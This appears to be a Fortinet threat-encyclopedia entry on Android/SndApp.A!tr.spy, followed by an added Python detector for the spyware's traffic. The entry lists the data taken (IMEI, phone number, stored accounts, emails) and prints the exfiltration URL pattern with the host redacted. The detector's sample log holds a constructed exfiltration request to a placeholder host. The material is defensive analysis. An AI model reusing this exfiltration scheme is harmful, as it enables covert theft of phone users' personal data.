Threat Encyclopedia

Android/SndApp.A!tr.spy

Analysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends several pieces of personal information, including the victim's email addresses, to a remote web server.
The application displays a splash screen such as Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy
If you press the icon in the top right corner, a list of affiliate apps is shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.


Technical Details


When the malware is launched, it collects:
  • phone's IMEI
  • phone number
  • network country ISO code (e.g. "fr")
  • operator's name
  • accounts memorized on the mobile phone. These are all the web accounts an end-user has the phone remember so that he/she does not need to enter credentials at each login: for instance Google accounts, Facebook accounts, e-commerce accounts, etc.
  • emails: the victim's email addresses. These are actually collected from the login names of the accounts above: when a login name looks like an email address (e.g. it contains an @), the malware assumes it is one and collects it.
This information is sent to a remote web site:
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
When pressing the icon for affiliate applications, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirect to the related applications.
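As an added detection example (not part of this encyclopedia entry or of Fortinet's own tooling), the following Python scans constructed proxy-log lines for requests matching the notifier.php exfiltration pattern described above and reports whether the deviceId looks like an IMEI and how many email addresses the request leaks. The host, log format and all sample values are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names taken from the URL pattern documented above;
# the real host is not known and a placeholder domain is used below.
EXFIL_PATH = "/android-notifier/notifier.php"
EXFIL_PARAMS = {"deviceId", "mobile", "country", "carrier", "email"}
IMEI_RE = re.compile(r"^\d{14,16}$")          # IMEI is 14-16 digits
EMAIL_RE = re.compile(r"[^@\s,;&]+@[^@\s,;&]+\.[A-Za-z]{2,}")

def classify_request(url):
    """Return a finding dict if the URL matches the exfiltration pattern, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith(EXFIL_PATH):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    present = EXFIL_PARAMS & set(qs)
    if len(present) < 3:                      # require most of the leaked fields
        return None
    device = qs.get("deviceId", [""])[0]
    emails = EMAIL_RE.findall(qs.get("email", [""])[0])
    return {
        "host": parts.hostname,
        "params": sorted(present),
        "imei_like": bool(IMEI_RE.match(device)),
        "emails_leaked": len(emails),
    }

def scan_proxy_log(lines):
    """Return [(line_no, finding)] for lines in a constructed
    '<timestamp> <client> <method> <url>' log format."""
    findings = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        hit = classify_request(fields[3])
        if hit:
            findings.append((n, hit))
    return findings

# Constructed sample log: one exfiltration request, one incomplete request, one benign request.
SAMPLE_LOG = [
    "2011-06-01T10:00:01Z 10.0.0.5 GET http://example.invalid/android-notifier/notifier.php"
    "?appId=1&deviceId=356938035643809&mobile=%2B33612345678&country=fr"
    "&carrier=OperatorX&email=alice%40example.invalid%2Cbob%40example.invalid",
    "2011-06-01T10:00:02Z 10.0.0.5 GET http://example.invalid/android-notifier/notifier.php?appId=1",
    "2011-06-01T10:00:03Z 10.0.0.6 GET http://example.invalid/index.html",
]

if __name__ == "__main__":
    for line_no, finding in scan_proxy_log(SAMPLE_LOG):
        print(line_no, finding)
```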

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.